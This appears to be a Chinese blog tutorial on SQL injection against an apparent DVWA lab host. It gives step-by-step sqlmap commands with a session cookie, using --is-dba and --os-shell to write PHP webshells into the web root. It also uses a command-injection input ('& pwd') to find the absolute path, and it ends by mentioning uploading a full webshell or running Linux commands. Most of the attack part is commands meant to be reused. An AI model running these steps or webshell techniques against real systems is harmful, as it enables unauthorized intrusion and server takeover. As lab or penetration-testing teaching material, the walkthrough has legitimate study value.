SQL注入实战— SQLMap之交互式写shell


当你的才华

还撑不起你的野心时

那你就应该静下心来学习

 


 

  使用sqlmap进行交互式写shell:

      1.打开http://10.1.1.136,输入用户名:admin 密码:password,登录 

      2.选择Command Execution,并输入:10.1.1.136 & pwd来获得一个绝对路径,

      /opt/lampp/htdocs/vulnerabilities/exec

       SQL注入实战— SQLMap之交互式写shell_第1张图片

      3.选择SQL Injection,输入一个数,使用burpsuite进行抓包,获取cookie。

      判断用户是否为dba,输入命令:

      sqlmap.py -u "http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low" --is-dba

      SQL注入实战— SQLMap之交互式写shell_第2张图片 

      4.接下来使用sqlmap进行交互式写shell

      输入命令:

      sqlmap.py -u "http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low" --os-shell

      脚本类型为PHP,所以输入4

      SQL注入实战— SQLMap之交互式写shell_第3张图片 

      5.选择2,输入第二步得到的路径

      SQL注入实战— SQLMap之交互式写shell_第4张图片 

      6.成功写入2个shell,一个用来执行命令的,另一个是用来上传的,打开链接:http://10.1.1.136/vulnerabilities/exec/tmpujhum.php

       SQL注入实战— SQLMap之交互式写shell_第5张图片

      7.接下来就是上传大马了。或者直接执行linux命令

      SQL注入实战— SQLMap之交互式写shell_第6张图片

注:使用sqlmap交互式写shell,只需知道网站绝对路径和一个注入点


我不需要自由,只想背着她的梦

一步步向前走,她给的永远不重


 

你可能感兴趣的:(渗透测试,SQLMap,前渗透篇)